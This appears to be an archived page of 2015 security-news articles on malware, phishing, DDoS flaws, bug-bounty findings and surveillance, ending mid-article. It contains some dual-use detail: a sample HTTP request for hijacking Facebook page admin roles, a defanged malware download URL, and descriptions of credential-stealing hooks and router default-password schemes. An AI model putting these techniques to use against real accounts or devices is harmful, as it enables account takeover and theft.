Articles 2015 August  - English Press  English Articles  Page  1  2  3  4  5  6  2020  2019  2018  2017  2016  2015  2014  2013  2012

H  Analysis  Android  Apple  APT  Attack  BigBrothers  BotNet  Congress  Crime  Crypto  Cryptocurrency  Cyber  CyberCrime  CyberSpy  CyberWar  Exploit  Forensics  Hacking  ICS  Incindent  iOS  IT  IoT  Mobil  OS  Phishing  Privacy  Ransomware  Safety  Security  Social  Spam  Virus  Vulnerebility

Jednotlivé èlánky jsou rozdìleny podle mìsícù a zde je najdete./The articles are broken down by month and can be found here.

2015 - January  February  March  April  May  June  July  August  September  October  November  December

Keyraider-malware-steals-certificates-keys-and-account-data-from-jailbroken-iphones

31.8.2015

Researchers have discovered a new strain of iOS malware dubbed KeyRaider that targets jailbroken devices and has the ability to steal certificates, private keys, and Apple account information. The malware already has claimed the private Apple account data of more than 225,000 victims. The KeyRaider malware was discovered by researchers at Palo Alto Networks, who were put onto the trail of the attack by a team of amateur enthusiasts in China called WeipTech that had come across a database that was storing the stolen Apple account data. The WeipTech team had heard multiple reports that some users’ Apple accounts were being hit with unauthorized purchases, and eventually found that users of jailbroken devices who had installed a specific “tweak”, or modification, were being targeted. User data was being gathered and uploaded to a remote server. They found a database on the server that contained more than 225,000 entries, some of which were in plaintext and others that were encrypted. The plaintext entries were Apple usernames, passwords, and GUIDs. “By reverse-engineering the jailbreak tweak, WeipTech found a piece of code that uses AES encryption with fixed key of “mischa07″. The encrypted usernames and passwords can be successfully decrypted using this static key. They then confirmed that the listed usernames were all Apple accounts and validated some of the credentials. The WeipTech researchers dumped around half of all entries in the database before a website administrator discovered them and shut down the service,” Claud Xiao of Palo Alto Networks wrote in a post explaining the attack and the KeyRaider malware. The WeipTech team contacted Palo Alto researchers about the findings, and the researchers quickly discovered that the tweak itself wasn’t stealing the data. Rather, the KeyRaider malware was doing the dirty work. Right now, it appears that the malware only is spreading through the Cydia repositories for jailbroken iOS devices on a Chinese Apple fan site called Weiphone. “The malware hooks system processes through MobileSubstrate, and steals Apple account usernames, passwords and device GUID by intercepting iTunes traffic on the device. KeyRaider steals Apple push notification service certificates and private keys, steals and shares App Store purchasing information, and disables local and remote unlocking functionalities on iPhones and iPads,” Xiao said. The KeyRaider malware typically is installed alongside tweaks and apps uploaded by individual users on the Weiphone site. Xiao said in his analysis that evidence in the code points to a user named “mischa07″, a term that also happens to be the hard-coded key for the encrypted data in the database the WeipTech team found. The goal of the malware seems to be to allow attackers to make unauthorized in-app purchases and other purchases using the victims’ stolen Apple account information.

“The KeyRaider malicious code exists in Mach-O dynamic libraries that are used as plugins for the MobileSubstrate framework. Through MobileSubstrate APIs, the malware can hook arbitrary APIs in system processes or in other iOS apps,” Xiao said. KeyRaider accomplishes its feat of stealing sensitive user and device information by intercepting the communications between compromised devices and the iTunes App Store. “When the App Store client asks the user to input their Apple account for login, the information is sent to the App Store server via an SSL encrypted session. In the replacement function of SSLWrite, KeyRaider looks for this kind of login session, and searches for specific patterns to find the Apple account’s username, password and device’s GUID in the data being transferred. Next, in the replacement function for SSLRead, these credentials are encrypted using the AES algorithm with the static key ‘mischa07′, and then sent to the KeyRaider C2 server,” Xiao said. “In some samples, KeyRaider also hooks the apsd process — the daemon process responsible for Apple Push Notification Service on iOS systems. It hooks the SecItemCopyMatching function defined in the Security framework. This API is used to search keychain items that match given search query.” The latter functionality is what enables KeyRaider to steal the certificate and private key from the user’s device, which is then sent, along with the GUID, to the attacker’s C2 server. The malware also gives the attackers the ability to download and install any paid app in the App Store for free, by using a victim’s stolen account information. Xiao said KeyRaider also has functionality that can allow an attacker to hold a victim’s phone for ransom. “It can locally disable any kind of unlocking operations, whether the correct passcode or password has been entered. Also, it can send a notification message demanding a ransom directly using the stolen certificate and private key, without going through Apple’s push server. Because of this functionality, some of previously used ‘rescue’ methods are no longer effective,” Xiao said. Palo Alto notified Apple of the attack last week and gave the company the stolen account information, as well.

Here's Top Features Expected in Next iPhone Release

31.8.2015

Only 9 days are left for Apple's annual new iPhone launch event, where the company will bring its various new products but the obvious stars of the show will be the iPhone 6s and the iPhone 6s Plus.
The company has not officially announced the iPhone 6S and iPhone 6S Plus yet, but a series of new, high-resolution photographs obtained by 9to5Mac show some new features coming to its next-generation iPhone.
The new iPhones – likely called the iPhone 6S and 6S Plus – will be introduced at Apple's fall event on September 9.
The leaked photos give us a closer look at two of the iPhone's key new features: Force Touch and a larger FaceTime camera.
Here are the list of features the new iPhone 6S and iPhone 6S Plus include:
Force Touch
The new iPhone 6S would include Force Touch technology that Apple introduced with the Apple Watch, and haptic feedback.
Here's how it works:
When a user press slightly harder on the screen, sensors in the screen detect the increased pressure and then the device responds with haptic feedback.
This simply means that, like Apple Watch, iPhone would also provide shortcuts to common iOS tasks.
Here are some instances of how Force Touch will be used with the iPhone 6S and iPhone 6S Plus:
Turn-by-turn navigation in Maps
Getting song choices when force touching a track in Music app
Jumping to voicemail by force touching the phone icon
A Larger FaceTime Camera
Below is the leaked photo that shows a larger front-facing FaceTime camera on the new iPhone 6S (black), compared to a smaller one on the iPhone 6 (white) underneath it.
Photos Leaked! Here're Top Features Expected in Next iPhone Release
FaceTime camera is designed for Selfie Lovers. It will help iPhone users take higher quality selfies even in the dark, as it comes with its own flash as well.
The rear camera would be 12 megapixels, an increase over the 8-megapixel approach that iPhone 6 and 6 Plus offer.
4K Video Support
The larger 12-megapixel rear-facing camera on the iPhone 6S would be capable of shooting video in full 4K high-definition resolution.
However, the current iPhone 6's 8-megapixel camera is capable of shooting 1080p videos.
Let's wait for September 9 event!

Six U.K. Teens Arrested for using Lizard Squad's DDoS Tool

30.8.2015

Six British teenagers arrested and released on bail on suspicion of launching cyber attacks on websites and services with the help of Lizard Squad DDoS attack tool, called Lizard Stresser.
Lizard Squad is infamous for hacking and knocking down the largest online gaming networks – PlayStation Network and Xbox Live – last year by launching massive Distributed Denial-of-Service (DDoS) attacks.
The notorious hacker group set up a website to let customers use its Lizard-branded DDoS-for-hire tool Lizard Stresser to launch similar DDoS attacks.
The six teens, arrested by the National Crime Agency, are accused of using Lizard Stresser DDoS tool to launch cyber attacks against a school, a national newspaper, gaming companies and a number of online retailers.
However, according to the law enforcement, none of the teenagers are believed to be the member of Lizard Squad, nor had any connection with the last year's Christmas hack against Sony and Microsoft's gaming services.
It is alleged that all the six suspects are accused of buying the DDoS tool using alternative payment services, like Bitcoin.
Regarding the arrests, Tony Adams, senior head of investigations for NCA's National Cyber Crime Unit, said:
By paying a comparatively small fee, tools like Lizard Stresser can cripple businesses financially and deprive people of access to important information and public services.
One of our key priorities is to engage with those on the fringes of cyber criminality, to help them understand the consequences of cyber crime and how they can channel their abilities into productive and lucrative legitimate careers.
The law enforcement didn't name the teenagers, but their age and city they belong to are given below:
An 18-year-old from Huddersfield, West Yorkshire
An 18-year-old from Manchester
A 16-year-old from Northampton
A 15-year-old from Stockport
A 17-year-old from Cardiff
A 17-year-old from Northolt, north-west London
All the six suspects have been bailed while two 18-year-olds from Manchester and Milton Keynes respectively were interviewed under caution.

Automating Metrics using RTIR REST API

30.8.2015
Metrics are an important part of incident response. You should know your average time to detect compromised systems and how successful phishing campaigns are against your users. To start successful metrics, you need to choose a taxonomy to use. In this example, we will be using the VERIS(1) taxonomy. It is well documented and allows you to compare yourself to the DBIR report.

One of the problems with metrics is the amount of time it takes to enter data and correlate it. While it may take less than 5 minutes to determine how many people responded to a phish, it may take up to 20 minutes to create the tickets in your tracking system. To greatly increase your efficiency and accuracy, scripting should be used.

RTIR(2) is an open source ticketing system for incident response based on Request Tracker. This system can be built based on the VERIS taxonomy by creating custom fields that match the categories. This system supports using a REST API(3) to automate the creation of tickets.

We need to create the following custom fields for our use case. Some of these will have static values and others will need to enter as a command line argument.

hacking.discovery_method, hacking.targeted, impact.security_incident, social.variety, social.vector,social.target, confidentiality.data.variety, misuse.variety

Additionally, we want to track other stats that aren't used in VERIS, but are very useful for tracking campaigns.

victim-username,ioc.attacker.ip, ioc.attacker.domain

Now that we have the basic breakdown of what fields we want to enter data in, we need to script it (4). You need to make sure you put in your credentials to the script along with the IP/DNS name of your server. The two main parts that you can adjust to fit any incident type are the arguments and the post_data. The ticket will be created and closed when the script is complete.

To run this script as posted, do the following:

>rt-phishing.py --username bob --ip 127.0.0.1 --domain malware.bad --creator twebb --time 5

While metrics are important, they shouldn’t be demanding to create. Anything that your SOC does that doesn’t require lots of documentation should be easily scripted.

1.http://veriscommunity.net/enums.html#section-incident_desc

2.https://www.bestpractical.com/rtir/

3.http://requesttracker.wikia.com/wiki/REST

4.https://github.com/tcw3bb/ISC_Posts/blob/master/RTIR-phish-template.py

Latest APT 28 Campaign Incorporates Fake EFF Spearphishing Scam

28.8.2015

Attackers, possibly associated with the Russian government, registered a phony Electronic Frontier Foundation domain earlier this month in an attempt to dupe users into thinking correspondence from the site was coming from the well-known privacy watchdog. The scheme, largely carried out via spear phishing, appears to be part of a larger campaign previously dubbed Pawn Storm. According to a blog post by the EFF’s Cooper Quintin on Thursday the fake domain – electronicfrontierfoundation.org – was registered more than three weeks ago and quickly used as part of an attack alongside a recently patched Java zero day. Oracle patched the vulnerability, along with 200 other bugs, last month as part of its quarterly critical patch update, but that apparently hasn’t stopped the group, also known as APT 28, from carrying out attacks. For this one, Quintin claims spear phishing emails were sent to targets that contained links to the malicious, fake EFF site. Once clicked on, the site redirects the user to another page on the fake site that contains a Java applet. Assuming the user is running an old, vulnerable version of Java, it’s exploited and the attacker is granted free reign to their machine. “The attacker, now able to run any code on the user’s machine due to the Java exploit, downloads a second payload, which is a binary program to be executed on the target’s computer,” Quintin writes. The EFF believes that the path and filename used in the exploit are the same as those used in other attacks carried out by Pawn Storm, particularly Sednit. The Sednit payload, which was analyzed earlier this summer, downloads a .DLL file, which is executed and opens a backdoor to several attacker-controlled domains that exfiltrate data. Pawn Storm, which was given the moniker APT 28 in a 2014 FireEye report, has been active for years now, but most recently made headlines for carrying out a slew of attacks earlier this summer, including exploiting zero days in Flash, Microsoft, and Java. The FireEye report noted that the attackers operated during business hours, on Moscow time, and use phishing that targets “privileged information related to governments, militaries and security organizations that would likely benefit the Russian government.” The zero day in Java was actually the first in quite some time, more than two years, found plaguing the platform. Oracle claimed when it was patched, the vulnerability was being used to exploit a U.S.-based defense contractor and foreign military outfits. The group has also been seen carrying out attacks on NATO forces and White House staff in the past. The EFF is warning that users who haven’t patched the vulnerability in Java are still susceptible and that while the phishing domain has been reported for abuse, it hasn’t been taken offline yet.

BitTorrent Fixes Reflective DDoS Attack Security Flaw

28.8.2015

Two weeks ago, we reported how a serious flaw in the popular peer-to-peer BitTorrent file sharing protocols could be exploited to carry out a devastating distributed denial of service (DDoS) attack, allowing lone hackers with limited resources to take down large websites.
Good news is that the developers of BitTorrent have fixed the security issue in its service that is being used by hundreds of Millions of users worldwide.
In a blog post published Thursday, BitTorrent announced that the flaw was resided in a reference implementation of the Micro Transport Protocol (uTP) called libuTP, which is used by many widely used BitTorrent clients such as μTorrent, Vuze and Mainline.
The San Francisco company also announced that it has rolled out a patch for its libuTP software that will stop miscreants from abusing the p2p protocol to conduct Distributed Reflective Denial-of-Service (DRDoS) attacks.
DRDoS attack is a more sophisticated form of conventional DDoS attack where open and misconfigured DNS (Domain Name System) can be used by anyone to launch high-bandwidth DDoS attacks on the target websites.
The vulnerability was made public two weeks ago by a research team led by Florian Adamsky of the City University London.
The researcher showed how an attacker could send malicious data to vulnerable BitTorrent applications to flood a third-party target with data traffic of up to a factor of 120 times bigger than the original request.
Just by replacing the attacker's IP address in the malicious User Datagram Protocol (UDP) packet with the spoofed IP address of the target, a hacker could flood the target server with data traffic, effectively making it offline.
However, BitTorrent said the company has yet not seen such attacks actively exploited in the wild.
"Florian responsibly contacted [BitTorrent] to share his findings," Christian Averill from BitTorrent wrote in a blog post. "This gave our engineering team the opportunity to mitigate the possibility of such an attack."
According to the company, uTorrent, BitTorrent and BitTorrent Sync clients were all patched up earlier this month.
However, to fix the issue, the BitTorrent and uTorrent clients will require acknowledgment packets from connection initiators before providing responses.
Denial of Service Amplification attacks are not at all new. The DoS amplification attacks have increased in the past years, and miscreants are mostly taking its advantages to attack major sites.
Last year, we saw cyber criminals exploiting a security weakness in the home and small office routers in order to amplify the bandwidth of their attack.
Also the same year, hackers succeeded in touching new heights of the massive DDoS attack targeting anti-DDoS protection firm CloudFlare with a massive 400Gbps DDoS attack.

Warning! How Hackers Could Hijack Your Facebook Fan Page With This Trick

28.8.2015

Facebook bounty hunter Laxman Muthiyah from India has recently discovered his third bug of this year in the widely popular social network website that just made a new record by touching 1 Billion users in a single day.
At the beginning of the year, Laxman discovered a serious flaw in Facebook graphs that allowed him to view or probably delete others photo album on Facebook, even without having authentication.
Just after a month, Laxman uncovered another critical vulnerability in the social network platform that resided in the Facebook Photo Sync feature, that automatically uploads photos from your mobile device to a private Facebook album, which isn’t visible to any of your Facebook friends or other Facebook users.
However, the flaw discovered by Laxman could allowed any third-party app to access and steal your personal photographs from the hidden Facebook Photo Sync album.
Hacking Any Facebook Page
Now, the latest bug in Laxman's list could allow attackers to take over control of your Facebook pages.
This time Laxman has found an issue with the "Facebook business pages" that are not specific to a single user account, but instead represent a business and are usually managed by a number of users.
However, Laxman could allow third-party apps to take complete control of a Facebook business page with limited permissions, possibly making the victim permanently lose administrator access to the page.
Here's How:
Third party Facebook applications are capable of performing all sets of operations, including post status on your behalf, publishing photos, and other tasks, but Facebook doesn't allow them to add or modify page admin roles.
Facebook allows a page administrator to assign different roles to different people in the organisation through manage_pages, a special access permission requested by third-party apps.
However, according to Laxman, an attacker can use a simple string of requests in an attempt to make himself as admin of the particular Facebook page.
Sample Request
The string something look like this:
POST /PGID/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
role=MANAGER&user=X&business=B&access_token=AAAA…
Here, page PGID belongs to business B, where one can manage_pages request to make user 'X' as a MANAGER (assign as an administrator) of the page.
This means these small changes in the request parameters could allow an attacker to gain complete control over your Facebook page.
Video Demonstration
Laxman has also provided a video demonstration that shows the attack in work. You can watch the video given below that will walk you through the entire procedure:

Laxman reported the flaw to the Facebook security team and received the reward of $2500 USD as a part of Facebook's bug bounty program.
Though the social network has now fixed the loophole, you must always be aware of the permissions you grant to any third-party applications.

Disgusting! Ashley Madison was Building an App – 'What's your Wife Worth?'
28.8.2015
After all the revelations made by the Impact Team past week, this was something different from the leaked data that had names, password and other details of Ashley Madison clients.
A dump from the leaked files unfold awful strategy of Avid Life Media (ALM), Ashley Madison's parent company, to launch an app called "What's your wife worth."
As the name says it all, the app allows men to Rate each others Wives.
Know Your Wife Worth
'What's your wife worth' was discovered in a June 2013 email exchanged between Noel Biderman, ALM's chief executive and Brian Offenheim, ALM's vice president of creative and design, which said that Biderman suggested Offenheim about the probable outlook of the app.
He suggested options like "Choice should be 'post your wife' and 'bid on someone's wife'," also mentioning: "I am not sure we should be asking for real names—rather usernames."
To which Offenheim gave some feedback, by attaching a dummy of the app's sign up design, which appeared something like this:
Disgusting! Ashley Madison was Building an App – 'What's your Wife Worth?'
Though Biderman liked it, somehow the app's development was not completed and the idea was dumped, as one of Biderman's colleagues referred the concept as horrible in the emails.
We are in a dilemma - whether the person referred to app's development as horrible or the idea behind the thought of developing such an app!
There were more than 197,000 emails that were leaked from Biderman's inbox by the hackers calling themselves as the Impact Team last Friday.
Besides this the hackers released personal information of more than 33 Million Ashley Madison accounts. Which led to suicides as well.

Mark's Milestone: 1 Billion People Uses Facebook in A Single Day

28.8.2015

Mark Zuckerberg broadcast in his Facebook post, that Monday Facebook made a record by counting ONE BILLION people accessing Facebook in a single day.
Zuckerberg shared his happiness and thanked the world. He was overwhelmed with the milestone Facebook has touched and even shared a video expressing his emotions.
"[Facebook] just passed an important milestone," Zuckerberg wrote in a Facebook post on Thursday. "For the first time ever, one billion people used Facebook in a single day."
That means roughly 1 in 7 people on Earth connected with their friends and family using Facebook in a single day.
Feeling Connected Indeed!
So far, Facebook is the world's largest online social networking website with 1.5 Billion monthly active users. Comparatively, Twitter has 316 Million monthly active users.
Zuckerberg felt proud of the Facebook community. As they are the ones, who helped him to reach such a position.
His post was then swarmed with his followers comments, which was a good read, as people from different places around the world shared their stories about how they met their long-lost friends and relatives, made new ones too!
Also, similar stories followed with people thanking and congratulating the man behind Facebook.
No lazy Monday this week @Facebook, Menlo Park, California.

German Spy-Agency Trades Citizens' Metadata in Exchange for NSA's Xkeyscore

28.8.2015

This is Really Insane!!
Germany's top intelligence agency handed over details related to German citizen metadata just in order to obtain a copy of the National Security Agency's Main XKeyscore software, which was first revealed by Edward Snowden in 2013.
According to the new documents obtained by the German newspaper Die Zeit, the Federal Office for the Protection of the Constitution (BfV - Bundesamtes für Verfassungsschutz) traded data of its citizens for surveillance software from their US counterparts.
Germany and the United States signed an agreement that would allow German spies to obtain a copy of the NSA's flagship tool Xkeyscore, to analyse data gathered in Germany. So they covertly illegally traded access to Germans' data with the NSA.
XKeyscore surveillance software program was designed by the National Security Agency to collect and analyse intercepted data it obtains traveling over a network.
German Spy-Agency Trades Citizens' Metadata in Exchange for NSA's Xkeyscore
The surveillance software is powerful enough to be able to pull up more than 20 Terabytes of data daily, including emails, chats, social media interactions, and even browsing histories all in real-time without bothering the need of any warrant, as The Hacker News reported in 2013.
It seems that when NSA demonstrated the XKeyscore software to Germany's domestic intelligence agency BfV back in 2011, the BfV was so impressed that it struck a deal with NSA to exchange data for computer software.
After two years long negotiation with the U.S., the German agency signed an agreement to receive the NSA spyware software and deploy it for analysing data gathered on German citizens.
In return, the German intelligence agency promised to share their citizens metadata. According to Die Zeit, the document "Terms of Reference" stated: "The BfV will: To the maximum extent possible share all data relevant to NSA's mission".
The BfV didn't fully informed Germany's data protection commissioner, nor it informed the Parliamentary Control Panel, which oversights the BfV, about the deal it signed with the United States.
"Once again, I have to learn from the press of a new BfV-NSA contract and the impermissible transfer of data to the [United States] secret service," Green Party parliamentarian Hans-Christian Ströbele, a member of the Parliamentary Control Panel, told Die Zeit.
However, the BfV still received a lower level of access compared to the other non-U.S. "Five Eyes" nations, including the United Kingdom, Canada, Australia and New Zealand, who all had direct access to the main XKeyscore system.

Facebook M: Facebook's Answer to Siri, Cortana and Google Now
27.8.2015

Microsoft's 'Cortana', Google's 'Google Now', Apple's 'Siri', Now meet Facebook's 'M.'
Facebook's announcement to introduce their Personal Digital Assistant “M” comes with powers within the Facebook Messenger. It is a similar virtual assistant like Google Now, Apple's Siri and Microsoft's smart digital assistant Cortana.
It seems that all the intelligence that resides within the personal digital assistants already in the market are nothing in front of M's capabilities, according to the Facebook post by David Marcus, Vice President of Messaging Products at Facebook.
Three days ago, Microsoft had boosted the powers of Android users by making Cortana accessible on Android devices. Now listening to Facebook's launch of 'M', rival companies would have definitely face-palmed!
What Can I Help You With?
The virtual assistant software "M" is truly going to support you by doing the work on your behalf, the team at Facebook tested this service enabled inside the Facebook messenger.
M behaves in a manner that beats the already existing virtual assistant software's artificial intelligence on to a next level altogether.
As the interaction is so genuine like you interact with your pals; M can:
Get you suggestions
Availability and Non-availability of things
Deliver things when you are away
Make reservations
Talk to you like an actual person being interacting
Though the answers to your questions are given by the intelligent team of M at the other end, in M you have to type and enquire about things unlike rival services, where you can say and manage the activity of the assistant.
"M is a hybrid backed by Facebook employees [team] with customer service backgrounds, called M trainers, who can also make travel arrangements [as well as] appointments," Marcus wrote.
There are many services like Magic and Operator and TaskRabbit already existing to solve your requests by making humans employed, but they do not have a massive audience.
Whereas M is power packed with the features of artificial intelligence as well as humans intelligence.
M is currently in its Beta version and is accessible to a few hundred Bay Area Facebook users at this time.
The feature already looks like an impressive service, to give it a thought what expansions it could take in its stable versions!

British-born ISIS Hacker Killed in US Drone Strike in Syria
27.8.2015

Remember Team Poison?
The hackers group that was active in 2012, and was known for gaining access to the former Prime Minister Tony Blair's address book and then publishing information from it.
The British hacker who actually obtained the Prime Minister's address book and was jailed for six months in 2012, named Junaid Hussain, has been killed in a United States drone strike in Syria, a source familiar with the matter said on Wednesday.
Hussain was a British hacker who rose to prominence within Islamic State group in Syria as a top cyber expert to mastermind the ISIS online war.
The U.S. military conducted the operation; no involvement of the British government in the killing of Hussain, a British citizen from Birmingham.
Junaid Hussain Killed in Raqqa
Hussain was killed in Raqqa, located in northern Syria, which has been treated as a safe place by ISIS.
The United States has yet to officially announce Hussain's death, which is not verified by the officials, beyond saying that the country launched airstrikes against ISIS on Tuesday near Raqqa.
"We have a high level of confidence [Hussain] was killed," one of the U.S. officials told CNN Wednesday.
The U.S. officials believe that the 21-year-old Hussain was heavily involved in inspiring attacks and was their high-value target in ISIS.
Hussain was involved in the Garland, Texas, cartoon contest attacks and helping ISIS in obtaining the passwords of the US Central Command's Twitter and YouTube accounts to send pro-Isis messages.
The officials believe that the drone strike on Hussain's vehicle Tuesday was a great "intelligence success."
Hussain's death was the second airstrike conducted against ISIS leaders and militants. Last week's airstrike killed one of the senior ISIS members, Hajji Mutazz, in Iraq.

PayPal Vulnerability Allows Hackers to Steal All Your Money
27.8.2015

A critical security vulnerability has been discovered in the eBay owned global e-commerce business PayPal that could allow attackers to steal your login credentials, and even your credit card details in unencrypted format.
Egypt-based researcher Ebrahim Hegazy discovered a Stored Cross Site Scripting (XSS) vulnerability in the Paypal's Secure Payments domain.
As it sounds, the domain is used to conduct secure online payments when purchasing from any online shopping website. It enables buyers to pay with their payment cards or PayPal accounts, eliminating the need to store sensitive payment information.
However, it is possible for an attacker to set up a rogue online store or hijacked a legitimate shopping website, to trick users into handing over their personal and financial details.
How the Stored XSS Attack Works?
Hegazy explains a step by step process in his blog post, which gives a detailed explanation of the attack.
Here's what the researcher calls the worst attack scenario:
An attacker need to set up a rogue shopping site or hijack any legitimate shopping site
Now modify the "CheckOut" button with a URL designed to exploit the XSS vulnerability
Whenever Paypal users browse the malformed shopping website, and click on "CheckOut" button to Pay with their Paypal account, they'll be redirected to the Secure Payments page
The page actually displays a phishing page where the victims are asked to enter their payment card information to complete the purchasing
Now on clicking the Submit Payment Button, instead of paying the product price (let's say $100), the Paypal user will pay the attacker amount of attacker's choice
Video Demonstration
The researcher has also provided a proof-of-concept (PoC) video that shows attack in work. You can watch the video here.


Hegazy reported this serious security vulnerability to the PayPal team on June 19th, and the team confirmed the security hole, which was fixed on August 25 – just over two months later.
PayPal has also rewarded Hegazy with a bug bounty of $750 for his findings, which is the company’s maximum bug bounty payout for XSS vulnerabilities.

Apple iOS Jailbreak Tweaks Have Backdoors; 220,000 iCloud Accounts Hacked

27.8.2015

Jailbreakers Beware!
Some shady tweaks that you installed on their jailbroken devices are looking to steal your iCloud login credentials, a report said.
The iCloud account details, including email addresses and passwords, of nearly 220,000 jailbreak users have been breached, an online Chinese vulnerability-reporting platform WooYun reported.
WooYun is an information security platform where researchers report vulnerabilities and vendors give their feedbacks.
Backdoor Privacy Attack
The security breach, according to the website, was a result of 'backdoor privacy attack' caused by the installation of a malicious jailbreak tweak.
It appears that Hackers are using a variety of "built-in backdoors" that could be numerous of malicious jailbreak tweaks in an effort to acquire victim's iCloud account information.
Once installed, these malicious tweaks transferred the iCloud login details of the jailbreak users to an unknown remote server.
So far, it is unclear that who is behind the attack, and what are their intentions to do with the stolen iCloud accounts. But, the report states that WooYun has notified the appropriate vendors – apparently Apple – about the issue and are awaiting processing.
Below you can see the (slightly) translated version of the report:
Apple iOS Jailbreak Tweaks Have Backdoors; 220,000 iCloud Accounts Hacked
Considering just one jailbreak tweak, 220,000 seems to be a huge number. Though it is believed that a number of malicious jailbreak tweaks have been used by the criminals, out of which many are posted as free versions of popular paid tweaks.
Who is Affected?
The security flaw has nothing to do with Apple's security and affects only iOS users who have attempted jailbreak on their devices.
However, with such a large number of compromised Cloud accounts, it appears that such an attack could be the result of a more organized method, which could be due to a pre-installed backdoor.
As pointed out by Reddit user ZippyDan, the Chinese market traders often sell iPhones and iOS devices that are pre-jailbroken. Also, many of these devices may have been passed on with the shady tweaks already installed.
How to Protect Yourself?
It's unlikely to say not to jailbreak your device, as we can take some necessary steps to tighten up our device security.
Here are some steps that you should implement to help protect yourself:
Enable 2 Factor Authentication for your iCloud Account
Do not add shady third-party repositories to Cydia
Do not install jailbreak tweaks from unknown and untrusted sources
Do not pirate tweaks or apps
If you have already enabled two-step authentication, it will prevent someone else from accessing your iCloud account even if they have your email address and password.

CERT Warns of Hard-Coded Credentials in DSL SOHO Routers

26.8.2015

DSL routers from a number of manufacturers contain hard-coded credentials that could allow a hacker to access the devices via telnet services and remotely control them. An advisory published Tuesday by the DHS-sponsored CERT at the Software Engineering Institute at Carnegie Mellon University said the issues are still present in the routers and that organizations could write firewall rules that block telnet or SNMP on the device as a temporary mitigation. Telnet network services are used by some manufacturers for remote support. The affected routers are manufactured by ASUS Tek (DSL-N12E), DIGICOM (DG-5524T), Observa Telecom (RTA01N), Philippine Long Distance Telephone (SpeedSurf 504AN) and ZTE (ZXV10 W300). CERT had issued a similar advisory in February 2014 for the ZTE device, but yesterday expanded it to include the other vendors. In May, a post to the Full Disclosure security mailing list from a group of security researchers from Universidad Europea de Madrid rattled off sundry vulnerabilities they found in 22 different small office and home office routers, including the hard-coded credentials in Observa Telecom routers. “A remote attacker may utilize these credentials to gain administrator access to the device,” CERT said in its advisory. The hard-coded credentials include a user name of “admin” or some variation in all the devices, as well as similar passwords that include part of the router’s MAC address, which is obtainable over SNMP with community string public, CERT said. CERT said that Asus was notified in May and PLDT in June of the issues affecting their respective routers, while ZTE was notified in December 2013. Observa Telecom, a common router used in Spain by its major ISP Telefonica, suffered from a number of serious vulnerabilities, including persistent and unauthenticated cross-site scripting and cross-site request forgery on a number of its devices beyond the RTA01N in question here. Home and small office routers are notoriously insecure and difficult to patch since they require new firmware and often those updates must be manually installed because there is no automated mechanism. One of the biggest router disclosures came last December when Check Point Software Technologies published details on a vulnerability it called Misfortune Cookie. The flaw affected more than 12 million devices running an embedded webserver called RomPager; the vulnerability could give an attacker in man-in-the-middle position access to traffic entering and leaving routers built by most manufacturers. An attacker need only send a single packet containing a malicious HTTP cookie to exploit the flaw. Such an exploit would corrupt memory on the device and allow an attacker to remotely gain administrative access to the device.

iOS Sandbox Vulnerability Puts Enterprise Data at Risk

26.8.2015

iOS Sandbox Vulnerability Puts Enterprise Data at Risk
"Change is the only constant thing," as it is known could be now modified as "Change is the only constant thing*," where the * means Terms and conditions apply!
A change (Mobile Device Management solutions-MDM, Bring Your Own Device-BYOD) was brought to the organizations, (which later became necessities) for smooth workflow and management of an organization; where resides mobile and other computing devices in masses.
The devices, as well as the MDM solutions, are at risk, as reported.
Security researchers at Appthority Mobile Threat Team, have found a vulnerability in the sandbox app within the Apple's iOS versions prior to 8.4.1, which makes the configuration settings of managed applications to be openly accessed by anyone.
QuickSand – Loophole in Sandbox
The vulnerability is assigned CVE-2015-5749 and is named as 'QuickSand' because of the loophole being present in the Sandbox.
Mobile Device Management (MDM) refers to managing the deployment, security and integration of all the mobile devices, including smartphones, tablets, and laptops, in an organization.
The aim of MDM solutions is to increase the use of mobile devices by keeping them secure within the enterprise while simultaneously protecting the corporate network.
MDM solutions are mostly dependent on vendors who implement the services based on their devices' management features.
MDM and EMM (Enterprise Mobility Management) solutions are delivered by vendors like FancyFon, AirWatch, MobileIron and AmTel MDM, allowing organizations to install corporate apps, including configuration and credentials, to its mobile devices.
This poses as a solution for employees to get an easy access to corporate resources.
Now, the researchers claim this violation is capable of affecting all MDM clients as well as any mobile apps distributed via an MDM in a corporate environment that use the 'Managed App Configuration' setting to configure and store private settings and information.
Here's what the researchers at Appthority wrote in a blog post:
The underlying issue with our critical sandbox violation discovery is that not only can a mobile app (or the MDM app itself) have access to this sensitive set-up and authentication information stored on the device, but anyone (or any app on any device) can also see the credential [data] on the mobile device as it is stored 'world readable'.
How the Attack Works?
The attackers can fool the users - in an environment where the MDM solution has been implemented - in two ways:
Pushing a malicious app in the complete organization, imitating as a productivity app that many users may install.
Targeting a particular user and luring him into various cyber attacks like phishing.
This is a vital situation, where chances of an organization becoming victims of the severe cyber attack are high. Sensitivity and size of the information being managed using MDM solutions do matter.
As today, the vulnerability may not be that critical in nature but it has certainly opened gates for the potential attackers to get away with the data and information.
Appthority and Apple security have worked together to the fix the vulnerability, which has been patched but for the iOS version 8.4.1 as of now.
Further, Appthority Mobile Threat Team has demonstrated the weakness with the MDM and provides some recommendations; you can link to their official blog for in-depth details.

AutoIt Used in Targeted Attacks to Move RATs

26.8.2015

Hackers, months ago, revived macros as an attack vector to primarily hide banking malware spread by spam campaigns. Not be left out, some targeted attacks kicked off by convincing phishing emails, have been moving a few remote access Trojans and other malware via Word docs. One particular targeted campaign, researchers at Cisco said, was using AutoIt to drop malware on compromised machines. AutoIt is freeware that allows Windows administrators to write scripts that automate tasks. Windows 10 Upgrade Spam Carries CTB-Locker Ransomware August 3, 2015 , 10:24 am The use of macros by hackers is mitigated by the fact they’ve been disabled by default since the release of Office 2007. But Cisco researchers said the language and spoofed senders in the phishing emails accompanying the targeted attacks could be enough to convince a potential victim to enable macros and execute the attack. “In this case, they’re impersonating a legitimate business. If the message is convincing enough, they could lower their guard and enable macros if they believe doing so will fully render a document or allow them to see the encoding of images a document may contain,” said Cisco Talos threat researcher Alex Chiu. “We’ve seen these techniques used with several targeted Dridex campaigns. They’re taking techniques that are old, and in this case, making them useful again.” The use of AutoIt is not only unique, but effective in allowing the attackers to evade detection. AutoIt is a legitimate IT administration tool and could be whitelisted in many enterprises. In the case of this particular campaign, the victim is urged to enable macros on a Word document that pretends to be from a legitimate business. Once the victim executes the attack, it reaches out to hxxp://frontlinegulf[.]com/tmp/adobefile.exe where it downloads a binary. The payloads change regularly Cisco said. AutoIt was one such payload, downloaded in a self-extracting archive. In addition to AutoIt, a 600MB AutoIt script was 